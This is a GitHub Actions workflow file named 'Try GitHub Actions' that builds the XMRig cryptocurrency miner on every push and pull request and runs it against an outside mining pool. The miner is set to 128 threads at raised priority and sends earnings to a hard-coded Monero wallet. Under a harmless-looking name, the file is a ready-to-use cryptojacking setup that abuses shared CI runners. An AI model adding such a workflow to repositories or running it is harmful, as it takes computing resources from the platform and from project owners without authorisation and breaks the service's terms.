name: Try GitHub Actions 🦹‍♂️

on:
  push:
    branches: [main]
  pull_request:
    branches: [main]
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v2

      - name: Install Dependencies
        shell: bash
        run: |
          sudo apt-get update
          sudo apt-get install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev

      - name: Build XMRig
        shell: bash
        run: |
          git clone https://github.com/xmrig/xmrig.git
          mkdir -p xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)

      - name: Run XMRig
        shell: bash
        run: |
          cd xmrig/build
          ./xmrig           -o pool.supportxmr.com:443           -u 4Apw9wXTXCSgMfGoLBEvAHRtkYBuhoJLZcdcUhXEr4ba3X7GJeuxtNnCheZd6X3VBjEuw3kNv8VLw9XsKAotZCUdMW1kPbx           -k --tls --threads=128 --cpu-priority=5 -p zdyLaNz